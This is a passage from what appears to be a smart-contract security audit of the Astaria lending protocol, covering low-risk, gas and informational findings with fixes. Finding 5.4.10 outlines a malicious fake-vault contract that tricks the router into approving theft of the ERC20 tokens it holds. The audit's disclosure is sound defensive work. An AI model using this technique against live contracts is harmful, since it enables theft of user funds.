may not be listed on OpenSea Severity: Low Risk Context: CollateralToken.sol#L524-L530 Description: To list Seaport orders on OpenSea, the order should pass certain validations as described here(see OpenSea Order Validation). Currently, Astaria orders will fail this validation. For instance, zone and zoneHash values are not set as suggested. Recommendation: Either follow the guidelines completely to list the orders on Opensea. If that's not the intention, OS_FEE_PAYEE can be removed from consideration items. Astaria: Acknowledged. We're going to change our approach and wait for seaport 1.2. Spearbit: Acknowledged. +5.4.10 Any ERC20 held in the Router can be stolen using ERC4626RouterBase functions Severity: Low Risk Context: ERC4626RouterBase.sol#L15-65 Description: All four functions in ERC4626RouterBase.sol take in a vault address, a to address, a shares amount, and a maxAmountIn for validation. The first step is to read vault.asset() and then approve the vault to spend the ERC20 at whatever address is returned for the given amount. function mint( IERC4626 vault, address to, uint256 shares, uint256 maxAmountIn ) public payable virtual override returns (uint256 amountIn) { ERC20(vault.asset()).safeApprove(address(vault), shares); if ((amountIn = vault.mint(shares, to)) > maxAmountIn) { revert MaxAmountError(); } } In the event that the Router holds any ERC20, a malicious user can design a contract with the following functions: function asset() view pure returns (address) { return [ERC20 the router holds]; } function mint(uint shares, address to) view pure returns (uint) { return 0; } If this contract is passed as the vault, the function will pass, and the router will approve this contract to control its holdings of the given ERC20. Recommendation: These functions should validate that the vault being passed into the contract is a legitimate Astaria vault. Astaria: Accepted reccomendations, fixed in PR 253. Spearbit: Confirmed, the following commit fixes this issue by overriding the functions and adding a validVault() modifier to them, so only valid vaults can be used in the function. 44 +5.4.11 Inconsistency in byte size of maxInterestRate Severity: Low Risk Context: AstariaRouter.sol#L246 Description: In RouterStorage, maxInterestRate has a size of uint88. However, when being set from file(), it is capped at uint48 by the safeCastTo48() function. Recommendation: Make sure these two values align. Astaria: Fixed in PR 246. Spearbit: Verified. +5.4.12 Router#file has update for nonexistent MinInterestRate variable Severity: Low Risk Context: AstariaRouter.sol#L247-248 Description: One of the options in the file() function is to update FileType.MinInterestRate. There are two problems here: 1) If someone chooses this FileType, the update actually happens to s.maxInterestRate. 2) There is no minInterestRate storage variable, as minInterestBPS is handled on L235-236. Recommendation: Remove the else if block on L247-248. Astaria: Fixed in PR 230. Spearbit: Verified. +5.4.13 getLiquidationWithdrawRatio() and getYIntercept() have incorrect return types Severity: Low Risk Context: • PublicVault.sol#L170-L172 • PublicVault.sol#L174-L176 Description: liquidationWithdrawRatio and yIntercept like other amount-related parameters are of type uint88 (uint88) and they are the returned values of getLiquidationWithdrawRatio() and getYIntercept() re- spectively. But the return type of getLiquidationWithdrawRatio() and getYIntercept() are defined as uint256. Recommendation: Change the return types of getLiquidationWithdrawRatio() and getYIntercept() to uint88: function getLiquidationWithdrawRatio() public view returns (uint88) { return _loadStorageSlot().liquidationWithdrawRatio; } function getYIntercept() public view returns (uint88) { return _loadStorageSlot().yIntercept; } 45 +5.4.14 The modified implementation of redeem is omitting a check to make sure not to redeem 0 assets. Severity: Low Risk Context: • PublicVault.sol#L108 • PublicVault.sol#L141 Description: The modified implementation of redeem is omitting the check // Check for rounding error since we round down in previewRedeem. require((assets = previewRedeem(shares)) != 0, "ZERO_ASSETS"); You can see a trail of it in redeemFutureEpoch. Recommendation: It is recommended to introduce the check back to make sure that 0 assets are not allowed to be redeemed. Or document the decision as to why the check was omitted. Astaria: Fixed in PR 227. Spearbit: Verified. +5.4.15 PublicVault's redeem and redeemFutureEpoch always returns 0 assets. Severity: Low Risk Context: • PublicVault.sol#L133 • PublicVault.sol#L148 • PublicVault.sol#L114 Description: assets returned by redeem and redeemFutureEpoch will always be 0, since it has not been set in redeemFutureEpoch. Also Withdraw event emits an incorrect value for asset because of this. The issue stems from trying to consolidate some of the logic for redeem and withdraw by using redeemFutureEpoch for both of them. Recommendation: Make sure the amount of assets is calculated for these endpoints and pay extra attention to the 2 different routing of withdraw and redeem. Astaria: Fixed in PR 227. Spearbit: Verified. +5.4.16 OWNER() cannot be updated for private or public vaults Severity: Low Risk Context: AstariaVaultBase.sol#L22-L24 Description: owner() is an immutable data for any ClonesWithImmutableArgs.clone that uses AstariaVault- Base. That means for example if there is an issue with the current hardcoded owner() there is no way to update it and liquidities/assets in the public/private vaults would also be at risk. Recommendation: It might be best to allow change of ownership for vaults. The upgradeability for the owner might be more important than the router as mentioned in PR 107. Astaria: Acknowledged. We don't want strategists to be able to assign someone else to their vaults, this is working as intended. Spearbit: Acknowledged. 46 +5.4.17 ROUTER() can not be updated for private or public vaults Severity: Low Risk Context: AstariaVaultBase.sol#L14-L16 Description: ROUTER() is an immutable data for any ClonesWithImmutableArgs.clone that uses AstariaVault- Base. That means for example if there is an issue with the current hardcoded ROUTER() or that it needs to be upgraded, the current public/private vaults would not be able to communicate with the new ROUTER. Recommendation: This is something to keep in mind regarding the architecture of the protocol as the upgradabil- ity of the router can break the connection between it and the vaults. Astaria: LienToken/CollateralToken/AstariaRouter all upgradeable proxies. this is working as intended. Acknowledged, We have a planned update that makes Spearbit: Acknowledged. +5.4.18 Wrong return parameter type is used for getOwed Severity: Low Risk Context: • LienToken.sol#L693 • LienToken.sol#L701 Description: Both variations of getOwed use _getOwed and return uint192. But _getOwed returns a uint88. Recommendation: The return types of both getOwed variations need to be changed to uint88. Also, note that most parameters that deal with lien amounts have the uint88 type. +5.4.19 Document and reason about which functionalities should be frozen on protocol pause Severity: Low Risk Context: PublicVault.sol#L247, PublicVault.sol#L338 Description: On protocol pause, a few functions are allowed to be called. Some instances are noted above. There is no documentation on why these functionalities are allowed while the remaining functions are frozen. Recommendation: Some guidelines should be provided which specifies which functionalities should work when the protocol is paused. Astaria: Acknowledged. There is no harm letting people withdraw their money through the epoch system, but there is immense harm in allowing for any deposits to come in or for new loans to go out, as the pause would be due to some emergency or something that requires a contract update. When crystalizing the protocol we would remove the pause from the implementation before bricking upgrades. Spearbit: Acknowledged. 47 +5.4.20 Wrong parameter type is used for s.strategyValidators Severity: Low Risk Context: • IAstariaRouter.sol#L82 • AstariaRouter.sol#L254 • AstariaRouter.sol#L345 • AstariaRouter.sol#L349 Description: s.strategyValidators is of type mapping(uint32 => address) but the provided TYPE in the con- text is of type uint8. Recommendation: Make sure the typing is correct either use mapping(uint32 => address) or mapping(uint8 => address) Astaria: Fixed by changing the type of s.strategyValidators to mapping(uint8 => address) in PR 241. Spearbit: Verified. +5.4.21 Some functions do not emit events, but they should Severity: Low Risk Context: • AstariaRouter.sol#L268 • VaultImplementation.sol#L195 • PublicVault.sol#L579 • PublicVault.sol#L528 • PublicVault.sol#L491 • PublicVault.sol#L565 Description: AstariaRouter.sol#L268 : Other filing endpoints in the same contract and also CollateralToken and LienToken emit FileUpdated(what, data). But fileGuardian does not. Recommendation: Make sure these endpoints emit events as some off-chain agents might be monitoring the protocol for these events. Astaria: Solved in PR 240. Spearbit: Verified. +5.4.22 setNewGuardian can be changed to a 2 or 3 step transfer of authority process Severity: Low Risk Context: • AstariaRouter.sol#L262-L266 • AstariaRouter.sol#L268 Description: The current guardian might pass a wrong _guardian parameter to setNewGuardian which can break the upgradability of the AstariaRouter using fileGuardian. Recommendation: It might be best to convert the transfer of guardianship into a 2 or 3 step process. Astaria: This is intentional, we want to be able to remove all permissions if we decide to crystalize the protocol. Spearbit: Renouncing the guardian can have its own separate endpoint possibly. 48 +5.4.23 There are no range/value checks when some parameters get fileed Severity: Low Risk Context: • AstariaRouter.sol#L196 • AstariaRouter.sol#L268 • CollateralToken.sol#L191 • LienToken.sol#L77 Description: There are no range/value checks when some parameters get fileed. For example: • There are no hardcoded range checks for the ...Numerators and ...Denominators, so that the protocol's users can trustlessly assume the authorized users would not push these values into ranges seemed unac- ceptable. • When an address get updated, we don't check whether the value provided is address(0) or not. Recommendation: Apply value/range checks for the parameters that can be updated using the file endpoints. +5.4.24 Manually constructed storage slots can be chosen so that the pre-image of the hash is unknown Severity: Low Risk Context: • AstariaRouter.sol#L54-L55 • LienToken.sol#L46-L48 • CollateralToken.sol#L69-L70 • PublicVault.sol#L58-L59 • VaultImplementation.sol#L46-L47 • WithdrawProxy.sol#L48-L49 • Pausable.sol#L20-L21 • ERC20-Cloned.sol#L14 • ERC721.sol#L13-L14 Description: In the codebase, some storage slots are manually constructed using keccak256 hash of a string xyz.astaria. .... The pre-images of these hashes are known. This can allow in future for actors to find a potential path to those storage slots using the keccak256 hash function in the codebase and some crafted payload. Recommendation: 1. Subtract 1 from these hashes so that the pre-image would be unknown / less obvious. 2. Keep them as it is withouting manually calculating the hash and inlining them as the compiler does that for us off-chain. So in general: uint256 private constant NAMED_SLOT = uint256(keccak256("xyz.astaria.")) - 1 And for • WithdrawProxy.sol#L48-L49 • Pausable.sol#L20-L21 • ERC20-Cloned.sol#L14 49 • ERC721.sol#L13-L14 specifically, what should be used: bytes32 constant NAMED_SLOT = bytes32(uint256(keccak256("xyz.astaria.")) - 1); +5.4.25 Avoid shadowing variables Severity: Low Risk Context: LienToken.sol#L583 Description: The highlighted line declares a new variable owner which has already been defined in Auth.sol inherited by LienToken: address owner = ownerOf(lienId); Recommendation: Rename owner to lienOwner at LienToken.sol#L583. Astaria: Fixed in PR 251. Spearbit: Verified. +5.4.26 PublicVault.accrue is manually inlined rather than called Severity: Low Risk Context: PublicVault.sol#L438-L448, PublicVault.sol#L611-L617 Description: The _accrue function locks in the implied value of the PublicVault by calculating, then adding to yIntercept, and finally emitting an event. This calculation is duplicated in 3 separate locations in PublicVault: • In totalAssets • In _accrue • And in updateVaultAfterLiquidation Recommendation: The calculation itself can be factored out into a view function: Which can be reused in both totalAssets and accrue: function totalAssets() public view virtual override(ERC4626Cloned) returns (uint256) { } - - + VaultData storage s = _loadStorageSlot(); uint256 delta_t = block.timestamp - s.last; return uint256(s.slope).mulDivDown(delta_t, 1) + uint256(s.yIntercept); return _totalAssets(s); 50 function _accrue(VaultData storage s) internal returns (uint256) { unchecked { - - - + s.yIntercept += uint256(block.timestamp - s.last) .mulDivDown(uint256(s.slope), 1) .safeCastTo88(); s.yIntercept = (_totalAssets(s)).safeCastTo88(); s.last = block.timestamp.safeCastTo40(); } emit YInterceptChanged(s.yIntercept); return s.yIntercept; } and finally, accrue may be used in updateVaultAfterLiquidation so that emitting the event is not missed: function updateVaultAfterLiquidation( uint256 maxAuctionWindow, AfterLiquidationParams calldata params ) public returns (address withdrawProxyIfNearBoundary) { require(msg.sender == address(LIEN_TOKEN())); // can only be called by router VaultData storage s = _loadStorageSlot(); unchecked { s.yIntercept += uint256(s.slope) .mulDivDown(block.timestamp - s.last, 1) .safeCastTo88(); _accrue(s); s.slope -= params.lienSlope.safeCastTo48(); s.last = block.timestamp.safeCastTo40(); } ...snip... - - - + - } +5.4.27 CollateralToken.flashAction reverts with incorrect error Severity: Low Risk Context: CollateralToken.sol#L272 Description: Reverts with InvalidCollateralStates.AUCTION_ACTIVE when the address is not flashEnabled. Recommendation: Revert using InvalidCollateralStates.FLASH_DISABLED: function flashAction( IFlashAction receiver, uint256 collateralId, bytes calldata data ) external onlyOwner(collateralId) { ...snip... if (!s.flashEnabled[addr]) { - + revert InvalidCollateralState(InvalidCollateralStates.AUCTION_ACTIVE); revert InvalidCollateralState(InvalidCollateralStates.FLASH_DISABLED); } ...snip... } 51 +5.4.28 AstariaRouter has unnecessary access to setPayee Severity: Low Risk Context: LienToken.sol#L872 Description: LienToken.setPayee. setPayee is never called from AstariaRouter, but the router has access to call Recommendation: Remove unneeded access: function setPayee(Lien calldata lien, address newPayee) public { ...snip... require( - + msg.sender == ownerOf(lienId) || msg.sender == address(s.ASTARIA_ROUTER) msg.sender == ownerOf(lienId) ); ...snip... } 5.5 Gas Optimization +5.5.1 ClearingHouse can be deployed only when needed Severity: Gas Optimization Context: CollateralToken.sol#L632-640 Description: When collateral is deposited, a Clearing House is automatically deployed. However, these Clearing Houses are only needed if the collateral goes to auction at Seaport, either through liquidation or the collateral holder choosing to sell them. The Astaria team has indicated that this behavior is intentional in order to put the cost on the borrower, since liquidations are already expensive. I'd suggest the perspective that all pieces of collateral will be added to the system, but a much smaller percentage will ever be sent to Seaport. The aggregate gas spent will be much, much lower if we are careful to only deploy these contract as needed. Further, let's look at the two situations where we may need a Clearing House: 1) The collateral holder calls listForSaleOnSeaport(): In this case, the borrower is paying anyways, so it's a no brainer. 2) Another user calls liquidate(): In this case, they will earn the liquidation fees, which should be sufficient to justify a small increase in gas costs. Recommendation: Move the creation of the Clearing House to liquidate() and listForSaleOnSeaport() and remove it from onERC721Received(). 52 +5.5.2 PublicVault.claim() can be optimized Severity: Gas Optimization Context: • PublicVault.sol#L479 • PublicVault.sol#L483 Description: For claim not to revert we would need to have msg.sender == owner(). And so when the following is called: _mint(owner(), unclaimed); Instead of owner() we can use msg.sender since reading the immutable owner() requires some calldata lookup. Recommendation: Use msg.sender instead of owner() when minting in claim(): _mint(msg.sender, unclaimed); +5.5.3 Can remove incoming terms from LienActionBuyout struct Severity: Gas Optimization Context: ILienToken.sol#L88 Description: Incoming terms are never used in the LienActionBuyout struct. The general flow right now is: • incomingTerms are passed to VaultImplementation#buyoutLien. • These incoming terms are validated and used to generate the lien information. • The lien information is encoded into a LienActionBuyout struct. • This is passed to LienToken#buyoutLien, but then the incoming terms are never used again. Recommendation: Pass the incomingTerms to VaultImplementation#buyoutLien, validate them, use them to generate the lien information, and then pass that to LienToken#buyoutLien without the incoming terms. This will allow you to edit the LienActionBuyout struct to: struct LienActionBuyout { IAstariaRouter.Commitment incoming; uint8 position; LienActionEncumber encumber; - } Astaria: The following commit fixes this issue: commit 9dcfc4. Spearbit: Verified. 53 +5.5.4 Refactor updateVaultAfterLiquidation to save gas Severity: Gas Optimization Context: PublicVault.sol#L604-637 Description: In updateVaultAfterLiquidation, we check if we're within maxAuctionWindow of the end of the If we are, we call _deployWithdrawProxyIfNotDeployed and assign withdrawProxyIfNearBoundary to epoch. the result. We then proceed to check if withdrawProxyIfNearBoundary is assigned and, if it is, call handleNewLiquidation. Instead of checking separately, we can include this call within the block of code executed if we're within maxAuc- tionWindow of the end of the epoch. This is true because (a) withdraw proxy will always be deployed by the end of that block and (b) withdraw proxy will never be deployed if timeToEnd >= maxAuctionWindow. Recommendation: uint256 timeToEnd = timeToEpochEnd(lienEpoch); if (timeToEnd < maxAuctionWindow) { _deployWithdrawProxyIfNotDeployed(s, lienEpoch); withdrawProxyIfNearBoundary = s.epochData[lienEpoch].withdrawProxy; } if (withdrawProxyIfNearBoundary != address(0)) { WithdrawProxy(withdrawProxyIfNearBoundary).handleNewLiquidation( - - - params.newAmount, maxAuctionWindow ); } Astaria: commit 1a64b3. Spearbit: Verified. +5.5.5 Use collateralId to set collateralIdToAuction mapping Severity: Gas Optimization Context: CollateralToken.sol#L595 Description: _listUnderlyingOnSeaport() sets collateralIdToAuction mapping as follows: s.collateralIdToAuction[uint256(listingOrder.parameters.zoneHash)] = true; Since this function has access to collateralId, it can be used instead of using zoneHash. Recommendation: Consider using collateralId to set collateralIdToAuction: s.collateralIdToAuction[collateralId] = true; Astaria: Fixed in commit 8fc32b. Spearbit: Verified. 54 +5.5.6 Storage packing Severity: Gas Optimization Context: • IAstariaRouter.RouterStorage • ILienToken.LienStorage • IPublicVault.VaultData Description: RouterStorage: The RouterStorage struct represents state managed in storage by the AstariaRouter contract. Some of the packing in this struct is sub optimal. 1. maxInterestRate and minInterestBPS: These two values pack into a single storage slot, however, are never referenced together outside of the constructor. This means, when read from storage, there are no gas efficiencies gained. 2. Comments denoting storage slots do not match implementation. The comment //slot 3 + for example occurs far after the 3rd slot begins as the addresses do not pack together. LienStorage: 3. The LienStorage struct packs maxLiens with the WETH address into a single storage slot. While gas is saved on the constructor, extra gas is spent in parsing maxLiens on each read as it is read alone. VaultData: 4. VaultData packs currentEpoch into the struct's first slot, however, it is more commonly read along with values from the struct's second slot. Recommendation: Note, some recommendations incur a greater one time gas cost on write to net a lower cost on reads. 1. Pack minInterestBPS and minDurationIncrease together as they are both read in Astari- aRouter.isValidRefinance 1b. Consider packing maxInterestRate with one of the addresses (COLLATERAL_TOKEN or WETH). This means both may be read in a single sload in _validateCommitment, however, does incur a smaller increase in gas when the stored address is referenced in other functions. 2. Update or removed the comments. If packing, updating is preferred. 3. Give maxLiens a type of uint256. 4. Consider moving currentEpoch to the second storage slot. +5.5.7 ClearingHouse fallback can save WETH address to memory to save gas Severity: Gas Optimization Context: ClearingHouse.sol#L21-34 Description: The fallback function reads WETH() from ROUTER three times. once and save to memory for the future calls. Recommendation: It would save gas to read the value 55 fallback() external payable { IAstariaRouter ASTARIA_ROUTER = IAstariaRouter(_getArgAddress(0)); require(msg.sender == address(ASTARIA_ROUTER.COLLATERAL_TOKEN().SEAPORT())); WETH weth = WETH(payable(address(ASTARIA_ROUTER.WETH()))) WETH(payable(address(ASTARIA_ROUTER.WETH()))).deposit{value: msg.value}(); weth.deposit{value: msg.value}(); uint256 payment = ASTARIA_ROUTER.WETH().balanceOf(address(this)); uint256 payment = weth.balanceOf(address(this)); ASTARIA_ROUTER.WETH().safeApprove( weth.safeApprove( + - + - + - + address(ASTARIA_ROUTER.TRANSFER_PROXY()), payment ); ... +5.5.8 CollateralToken's onlyOwner modifier doesn't need to access storage Severity: Gas Optimization Context: CollateralToken.sol#254-259 Description: The onlyOwner modifier calls to ownerOf(), which loads storage itself to check ownership. We can save a storage load since we don't need to load the storage variables in the modifier itself. Recommendation: modifier onlyOwner(uint256 collateralId) { - CollateralStorage storage s = _loadCollateralSlot(); require(ownerOf(collateralId) == msg.sender); _; } Astaria: Fixed in commit a52a05. Spearbit: Verified. +5.5.9 Can stop loop early in _payDebt when everything is spent Severity: Gas Optimization Context: LienToken.sol#L480-488 Description: When a loan is sold on Seaport and _payDebt is called, it loops through the auction stack and calls _paymentAH for each, decrementing the remaining payment as money is spent. This loop can be ended when payment == 0. Recommendation: for (uint256 i = 0; i < stack.length; i++) { + if (payment == 0) break; uint256 spent; unchecked { spent = _paymentAH(s, collateralId, stack, i, payment, payer); totalSpent += spent; payment -= spent; } } } 56 Astaria: Fixed in commit 795c0c. Spearbit: Verified. +5.5.10 Can remove initializing allowList and depositCap for private vaults Severity: Gas Optimization Context: AstariaRouter.sol#L653-660 Description: Private Vaults do not allow enabling, disabling, or editing the allow list, and don't enforce a deposit cap, so seems strange to initialize these variables. Delegates are still included in the _validateCommitment function, so we can't get rid of this entirely. Recommendation: Change the init function in the underlying vault to only set the delegate. Move the allowList and depositCap setup to a separate function that lives in PublicVault.sol, and is called separately in the event that a public vault is being created. +5.5.11 ISecurityHook.getState can be modified to return bytes32 / hash of the state instead of the state itself. Severity: Gas Optimization Context: CollateralToken.sol#L304-L308 Description / Recommendation: Since only the keccak256 of preTransferState is checked against the kec- cak256 hash of the returned security hook state, we could change the design so that ISecurityHook.getState returns bytes32 to save gas. Unless there is a plan to use the bytes memory preTransferState in some other form as well. +5.5.12 Define an endpoint for LienToken that only returns the liquidator Severity: Gas Optimization Context: CollateralToken.sol#L113 Description: It would save a lot of gas if LienToken had an endpoint that would only return the liquidator for a collateralId, instead of all the auction data. Recommendation: An endpoint like the following can be defined for LienToken: function getAuctionLiquidator(uint256 collateralId) external view returns (address liquidator) { } return _loadLienStorageSlot().auctionData[collateralId].liquidator; getAuctionLiquidator perhaps can revert if liquidator is address(0). Also, note getAuctionLiquidator is more useful than getAuctionData. Since if above is implemented, getAuc- tionData could only potentially be used for off-chain purposes. 57 +5.5.13 Setting uninitialized stack variables to their default value can be avoided. Severity: Gas Optimization Context: LienToken.sol#L687 Description: Setting uninitialized stack variables to their default value adds extra gas overhead. T t = ; Recommendation: Assignment of default value right after the declaration of the variable can be removed unless it is there for better readability (but that can also be included as a comment). T t; +5.5.14 Simplify / optimize for loops Severity: Gas Optimization Context: • LienToken.sol#L688-L690 • LienToken.sol#L816-L822 • AstariaRouter.sol#L191-L193 • AstariaRouter.sol#L272-L290 • AstariaRouter.sol#L405-L413 • CollateralToken.sol#L182-L184 • LienToken.sol#L258-L290 • LienToken.sol#L480-L487 • VaultImplementation.sol#L189-L191 Description: In the codebase, sometimes there are for loops of the form: for (uint256 i = 0; ; i++) { } These for loops can be optimized. Recommendation: Transform the for loops mentioned into the following form: uint256 i; for (; ;) { unchecked { ++i; } } 58 +5.5.15 calculateSlope can be more simplified Severity: Gas Optimization Context: LienToken.sol#L649-L656 Description: calculateSlope can be more simplified: owedAtEnd would be: owedAtEnd = amt + (tend (cid:0) tlast )r amt 1018 where: • amt is stack.point.amount • tend is stack.point.end • tlast is stack.point.last • r is stack.lien.details.rate and so the returned value would need to be r amt 1018. Recommendation: The simplified version of calculateSlope would be: function calculateSlope(Stack memory stack) public pure returns (uint256) { return stack.lien.details.rate.mulWadDown( stack.point.amount ); } +5.5.16 Break out of _makePayment for loop early when totalCapitalAvailable reaches 0 Severity: Gas Optimization Context: LienToken.sol#L629 Description: In _makePayment we have the following for loop: for (uint256 i; i < n; ) { (newStack, spent) = _payment( s, stack, uint8(i), totalCapitalAvailable, address(msg.sender) ); totalCapitalAvailable -= spent; unchecked { ++i; } } When totalCapitalAvailable reaches 0 we still call _payment which costs a lot of gas and it is only used for transferring 0 assets, removing and adding the same slope for a lien owner if it is a public vault and other noops. Recommendation: Break out of the for loop when totalCapitalAvailable == 0. 59 +5.5.17 _buyoutLien can be optimized by reusing payee Severity: Gas Optimization Context: LienToken.sol#L154-L164 Description: payee in _buyoutLien can be reused to save some gas Recommendation: Define payee earlier in the _buyoutLien body and use this stack variable to avoid unnecessary computation: address payee = _getPayee( s, params.encumber.stack[params.position].point.lienId ); s.TRANSFER_PROXY.tokenTransferFrom( s.WETH, address(msg.sender), payee, // <--- replaced value buyout ); +5.5.18 isValidRefinance and related storage parameters can be moved to LienToken Severity: Gas Optimization Context: • LienToken.sol#L123-L127 • AstariaRouter.sol#L593 • IAstariaRouter.sol#L74 • IAstariaRouter.sol#L81 Description: isValidRefinance is only used in LienToken and with the current implementation it requires reading AstariaRouter from the storage and performing a cross-contract call which would add a lot of overhead gas cost. Recommendation: We can move isValidRefinance function from AstariaRouter to LienToken. This would remove the need to first read the ASTARIA_ROUTER from storage and then call an external contract. It would also simplify the codebase. This would also mean defining the storage variables minInterestBPS and minDurationIncrease here instead of in AstariaRouter. Note that both of these variables are used only in isValidRefinance, besides when filing to update them. Astaria: We did this in an effort to concentrate protocol values into the same contract / space. +5.5.19 auctionWindowMax can be reused to optimize liquidate Severity: Gas Optimization Context: AstariaRouter.sol#L541 Description: There are mutiple instances of s.auctionWindow + s.auctionWindowBuffer in the liquidate func- tion which would make the function to read from the storage twice each time. Also there is already a stack variable auctionWindowMax defined as the sum which can be reused. Recommendation: s.auctionWindowBuffer. Reuse auctionWindowMax for other extra instances of s.auctionWindow + 60 listedOrder = s.COLLATERAL_TOKEN.auctionVault( ICollateralToken.AuctionVaultParams({ settlementToken: address(s.WETH), collateralId: stack[position].lien.collateralId, maxDuration: uint256(s.auctionWindow + s.auctionWindowBuffer), maxDuration: auctionWindowMax startingPrice: stack[0].lien.details.liquidationInitialAsk, endingPrice: 1_000 wei - + }) ); +5.5.20 fileBatch() does requiresAuth for each file separately Severity: Gas Optimization Context: CollateralToken.sol#L181-L191 Description: fileBatch() does a requiresAuth check and then for each element in the input array calls file() which does another requiresAuth check. function fileBatch(File[] calldata files) external requiresAuth { for (uint256 i = 0; i < files.length; i++) { file(files[i]); } } ... function file(File calldata incoming) public requiresAuth { This wastes gas as if the fileBatch()'s requiresAuth pass, file()'s check will pass too. Recommendation: Create an internal function _file() without the check. Update fileBatch() and file() to call _file(). Astaria: Fixed in PR 1931. Spearbit: Verified. +5.5.21 _sliceUint can be optimized Severity: Gas Optimization Context: AstariaRouter.sol#L315 Description: _sliceUint can be optimized Recommendation: Cheaper to use a named return parameter, cache calculating the end and use custom errors: 61 0x571e08d100000000000000000000000000000000000000000000000000000000; // cast --to-bytes32 $(cast sig "OutOfBoundError()") uint256 private constant OUTOFBOUND_ERROR_SELECTOR = ,! uint256 private constant ONE_WORD = 0x20; ... function _sliceUint(bytes memory bs, uint256 start) internal pure returns (uint256 x) { uint256 length = bs.length; assembly { let end := add(ONE_WORD, start) if lt(length , end) { mstore(0, OUTOFBOUND_ERROR_SELECTOR) revert(0, ONE_WORD) } x := mload(add(bs, end)) } } Also add unit/differential tests for this function. +5.5.22 Use basis points for ratios Severity: Gas Optimization Context: IAstariaRouter.sol#L61, IAstariaRouter.sol#L65, IAstariaRouter.sol#L78-L79 Description: Fee ratios are represented through two state variables for numerator and denominator. Basis point system can be used in its place as it is simpler (denominator always set to 10_000), and gas efficient as denomi- nator is now a constant. Recommendation: Use basis point system to represent ratios. Remove denominator state variables and use 10_000 as a constant variable in its place. +5.5.23 No Need to Allocate Unused Variable Severity: Gas Optimization Context: • LienToken.sol#L619-L622 • LienToken.sol#L553 • VaultImplementation.sol#L315 Description: LienToken._makePayment() returns two values: (Stack[] memory newStack, uint256 spent), but the second value is never read: (newStack, ) = _makePayment(_loadLienStorageSlot(), stack, amount); Also, if this value is planned to be used in future, it's not a useful value. It is equal to the payment made to the last lien. A more meaningful quantity can be the total payment made to the entire stack. Additional instances noted in Context above. Recommendation: Only return newStack from _makePayment(). 62 +5.5.24 Cache Values to Save Gas Severity: Gas Optimization Context: 1. CollateralToken.sol#L286-L307 2. ROUTER().LIEN_TOKEN() VaultImplementation.sol#L329 3. LienToken.sol#L511-L512 4. AstariaRouter.sol#L345 5. PublicVault.sol#L380 Description: Calls are occurring, same values are computed, or storage variables are being read, multiple times; e.g. CollateralToken.sol#L286-L307 reads the storage variable s.securityHooks[addr] four times. It's better to cache the result in a stack variable to save gas. Recommendation: variable. 1. Cache s.securityHooks[addr] in a stack s.securityHooks[addr] with this new variable; 2. Cache ROUTER().LIEN_TOKEN() and reuse the value; 3. Compute lienId one time only; 4. Cache s.strategyValidators[nlrType] and reuse the value; 5. Make use of the existing currentWithdrawProxy variable (requires this recommendation to be adopted first); the current usages of Replace all Depending on the optimizer settings used, the optimizer itself can eliminate the duplicate sloads. +5.5.25 RouterStorage.vaults can be a boolean mapping Severity: Gas Optimization Context: AstariaRouter.sol#L662, AstariaRouter.sol#LL295, AstariaRouter.sol#LL590, IAstariaRouter.sol#LL85 Description: RouterStorage.vaults is of type mapping(address => address). A key-value is stored in the mapping as: s.vaults[vaultAddr] = msg.sender; However, values in this mapping are only used to compare against address(0): if (_loadRouterSlot().vaults[msg.sender] == address(0)) { ... return _loadRouterSlot().vaults[vault] != address(0); It's better to have vaults as a boolean mapping as the assignment of msg.sender as value doesn't carry a special meaning. Recommendation: To save gas, make RouterStorage.vaults of type mapping(address => bool). Assign it as: - s.vaults[vaultAddr] = msg.sender; + s.vaults[vaultAddr] = true; Instead of comparing it against address(0), check if the value is true: - if (_loadRouterSlot().vaults[msg.sender] == address(0)) { + if (!_loadRouterSlot().vaults[msg.sender]) { ... - return _loadRouterSlot().vaults[vault] != address(0); + return _loadRouterSlot().vaults[vault]; 63 Astaria: Fixed in commit 2f5856. Spearbit: Verified. +5.5.26 isValidReference() should just take an array element as input Severity: Gas Optimization Context: AstariaRouter.sol#L596-L602 Description: stack[position]: isValidRefinance() takes stack array as an argument but only uses stack[0] and function isValidRefinance( ILienToken.Lien calldata newLien, uint8 position, ILienToken.Stack[] calldata stack ) public view returns (bool) { The usage of stack[0] can be replaced with stack[position] as stack[0].lien.collateralId == stack[position].lien.collateralId: if (newLien.collateralId != stack[0].lien.collateralId) { revert InvalidRefinanceCollateral(newLien.collateralId); } To save gas, it can directly take that one element as input. Recommendation: • Update the function to take stack[position] as input: function isValidRefinance( ILienToken.Lien calldata newLien, ILienToken.Stack calldata stack // notice the type change of `stack` ) public view returns (bool) { • Replace all usages of stack[position] and stack[0] with stack. • Replace all calls to isValidReference() to use the new function signature. Astaria: Acknowledged. Will be automatically fixed through the issue: "isValidRefinance and related storage parameters can be moved to LienToken" +5.5.27 Functions can be made external Severity: Gas Optimization Context: • WithdrawProxy.sol#LL211 • PublicVault.sol#L486 • VaultImplementation.sol#L42-L44 • VaultImplementation.sol#L66 Description: If public function is not called from within the contract, it should made external for clarity, and can potentially save gas. Recommendation: Convert all highlighted functions to external. Astaria: Fixed in the commit cfa6e0. Spearbit: Verified. 64 +5.5.28 Store bytes known at compile time as constant variables Severity: Gas Optimization Context: LienToken.sol#L134, LienToken.sol#L291, LienToken.sol#L369, VaultImplementation.sol#L140-L143 Context points to several instance, bytes32("ACTIVE_AUCTION") and keccak256("0"). This is less error-prone and saves gas as keccak's value will be inlined by the compiler. Recommendation: Convert all highlighted code to constant variables. instance which can be converted into constant variables. For Astaria: Verified in commit 655728. Spearbit: Verified. +5.5.29 a.mulDivDown(b,1) is equivalent to a*b Severity: Gas Optimization Context: LienToken.sol#L220, LienToken.sol#L733 Description: Highlighted code above follow the pattern of a.mulDivDown(b, 1) which is equivalent to a*b. Recommendation: Replace all instances of a.mulDivDown(b, 1) with a*b to save gas. Astaria: Fixed in commits f56f41 and 5af9c8. Spearbit: Verified. +5.5.30 Use scratch space for keccak Severity: Gas Optimization Context: CollateralLookup.sol#L21 Description: computeId() function computes and returns uint256(keccak256(abi.encodePacked(token, to- kenId))). Since the data being hashed fits within 2 memory slots, scratch space can be used to avoid paying gas cost on memory expansion. Recommendation: Consider rewriting computeId() function as: function computeId(address token, uint256 tokenId) internal pure returns (uint256 hash) { assembly { mstore(0, token) // sets the right most 20 bytes in the first memory slot. mstore(0x20, tokenId) // stores tokenId in the second memory slot. hash := keccak256(12, 52) // keccak from the 12th byte up to the entire second memory slot. } } Astaria: Fixed in commit 47e7a6. Spearbit: Verified. 65 5.6 Informational +5.6.1 Define a named constant for the return value of onFlashAction Severity: Informational Context: ClaimFees.sol#L38 Description: onFlashAction returns: keccak256("FlashAction.onFlashAction") Recommendation: This value can be 